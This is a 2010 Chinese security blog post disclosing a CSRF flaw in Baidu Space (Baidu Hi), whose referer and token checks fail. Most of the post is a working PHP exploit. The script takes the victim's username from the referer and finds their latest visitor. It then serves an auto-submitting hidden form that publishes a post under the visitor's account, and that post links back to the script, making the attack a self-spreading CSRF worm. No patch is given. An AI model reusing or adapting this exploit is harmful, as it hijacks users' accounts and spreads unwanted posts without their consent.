百度Hi CSRF Bug
2010年05月14日 |
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 |
Author: menzhi007 Blog: http://hi.baidu.com/menzhi007 Team: http://www.80vul.com date: 2010年5月13日 一 分析 百度空间未严格验证referer,且其token验证失效,从而引发CSRF漏洞。结合其浏览访客记录,可引发CSRF蠕虫。 二 利用 当百度空间用户浏览某页面地址时,误点击某超链接(或图片等),如<a href=http://www.l4mp.org/lab/pdf.php>Hi</a>,pdf.php用来截取其referer中的用户名,然后发送请求获取该用户名首页的最后一位浏览访客记录,并利用CSRF提交发布同样一篇文章,从而引发蠕虫。 示例代码: <?php $referer = $_SERVER['HTTP_REFERER']; preg_match("/http:\/\/hi\.baidu\.com\/([a-z0-9_%]+)\/blog/i",$referer,$sitename); $result = get_data("hi.baidu.com","/".$sitename[1]); //preg_match("/\[\"(([a-z0-9_%])+)\"\,\"[a-z0-9_%]+\"\,\"/i",$result,$match_valid); preg_match("/<a href=\"\/([a-z0-9_%]+)\" target=\"_blank\" class=\"ucard\"/i",$result,$match); if(!empty($match[1])&&!empty($sitename[1])) { $show= '<body onload="document.form1.submit();"> <form name="form1" id="popFormSubmit" action=" http://hi.baidu.com/'.$match[1].'/commit" method="post" > <input type="hidden" name="bdstoken" value="menzhi007"> <input type="hidden" name="ct" value="1"> <input type="hidden" name="cm" value="1"> <input type="hidden" name="spBlogID" > <input type="hidden" name="spBlogCatName" value="默认分类"> <input id="edithid" name="edithid" type="hidden"> <input type="hidden" name="spRefURL" id="spRefURL"> <input type="hidden" name="spBlogTitle" value="Hi menzhi007"> <input type="hidden" name="spBlogText" value="Hi Hero!<br>参考: <a href=http://www.l4mp.org/lab/pdf.php>http://www.l4mp.org/lab/pdf</a>"> <input type="hidden" name="spBlogCatName" value="%C4%AC%C8%CF%B7%D6%C0%E0"> <input type="hidden" name="spIsCmtAllow" value="1"> <input type="hidden" name="spBlogPower" value="0"> <input type="hidden" name="spShareNotAllow" value="0"> <input type="hidden" name="spVcode"> <input type="hidden" name="spVerifyKey"> <input name="tj" type="submit" value=" 发表文章 " > </form> </body>'; echo $show; } else { echo "Hi"; } function get_data($host,$path) { $cmd = ''; $data = "GET ".$path." HTTP/1.1\r\n"; $data .= "Accept: */*\r\n"; $data .= "Accept-Language: zh-cn\r\n"; $data .= "Content-Type: application/x-www-form-urlencoded\r\n"; $data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n"; $data .= "Host: $host\r\n"; $data .= "Content-Length: ".strlen($cmd)."\r\n"; $data .= "Connection: Close\r\n\r\n"; $data .= $cmd; $fp = fsockopen($host, 80); fputs($fp, $data); $resp = ''; while ($fp && !feof($fp)) $resp .= fread($fp, 1024); return $resp; } ?> 三 补丁 缺 |
没有评论
暂无评论
RSS feed for comments on this post.
对不起,该文章的评论被关闭了!